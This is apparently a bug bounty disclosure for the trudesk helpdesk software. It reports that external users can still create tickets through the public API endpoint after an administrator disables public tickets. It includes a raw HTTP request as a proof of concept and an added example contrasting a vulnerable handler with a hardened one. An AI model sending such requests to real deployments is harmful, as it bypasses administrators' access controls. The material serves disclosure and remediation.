Improper Privilege Management in polonel/trudesk


Reported on

Jun 15th 2021


external user can submit ticket even when its disabled


1. First, from the admin account go to Settings --> Tickets and disable "Allow public tickets".
External users now cannot create a ticket using the URL http://localhost:8118/newissue .

2. Now, as an external user, send the request below, which will still create a public ticket:

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0


So, despite public ticket creation being disabled, an external user can still create a ticket: the setting only hides the /newissue form, while the /api/v1/public/tickets/create endpoint does not check it.
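The following is an added example, not trudesk's own code or its fix: a minimal model of a public-ticket endpoint, first in the shape the report describes (the "Allow public tickets" setting only hides the /newissue form, so a direct POST succeeds) and then with the setting re-checked inside the API handler. The settings key name 'allowPublicTickets', the in-memory stores and the request body are all constructed assumptions; Express is not required, since handlers take a request-like object and return { status, body }.

```javascript
// Added example (not trudesk's code): vulnerable vs. hardened handler for a
// public-ticket-creation endpoint whose enabling setting lives in admin config.

// Constructed in-memory settings store standing in for the application's
// settings collection. The key name 'allowPublicTickets' is an assumption.
function makeSettings(allowPublicTickets) {
  const values = { allowPublicTickets };
  return { get: (key) => values[key] };
}

// Constructed in-memory ticket store.
function makeTicketStore() {
  const rows = [];
  return {
    insert(ticket) {
      rows.push({ id: rows.length + 1, ...ticket });
      return rows[rows.length - 1];
    },
    count() { return rows.length; },
  };
}

// Shared persistence step used by both handler variants.
function storePublicTicket(store, body) {
  const { subject, issue } = body || {};
  if (typeof subject !== 'string' || typeof issue !== 'string' || !subject || !issue) {
    return { status: 400, body: { error: 'subject and issue are required' } };
  }
  const ticket = store.insert({ subject, issue, source: 'public' });
  return { status: 200, body: { ticket } };
}

// Vulnerable shape: the API trusts that the (hidden) form was the only way in,
// so a direct POST succeeds even when public tickets are disabled.
function createPublicTicketVulnerable(settings, store, req) {
  return storePublicTicket(store, req.body);
}

// Generic gate: deny unless a boolean setting is explicitly true, so a missing
// or malformed setting fails closed rather than open.
function requireSetting(settings, key, handler) {
  return (store, req) => {
    if (settings.get(key) !== true) {
      return { status: 403, body: { error: `${key} is disabled` } };
    }
    return handler(settings, store, req);
  };
}

// Hardened shape: the same handler behind the gate, so the server enforces the
// setting on every request instead of relying on the UI to hide the form.
function createPublicTicketHardened(settings, store, req) {
  return requireSetting(settings, 'allowPublicTickets', createPublicTicketVulnerable)(store, req);
}

// Stand-alone demonstration with a constructed request resembling the one in
// the report (headers omitted; only the JSON body reaches the handler).
function demo() {
  const settings = makeSettings(false); // admin has disabled public tickets
  const req = {
    method: 'POST',
    path: '/api/v1/public/tickets/create',
    body: { subject: 'constructed subject', issue: 'constructed issue text' },
  };
  const vulnerable = createPublicTicketVulnerable(settings, makeTicketStore(), req).status;
  const hardened = createPublicTicketHardened(settings, makeTicketStore(), req).status;
  return { vulnerable, hardened }; // { vulnerable: 200, hardened: 403 }
}
```

The point of `requireSetting` is that the authorization decision is made server-side on the same request that performs the write; disabling a form in the browser is a usability change, not a control.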


Chris Brame validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame confirmed that a fix has been merged on 17c2eb a year ago
Chris Brame has been awarded the fix bounty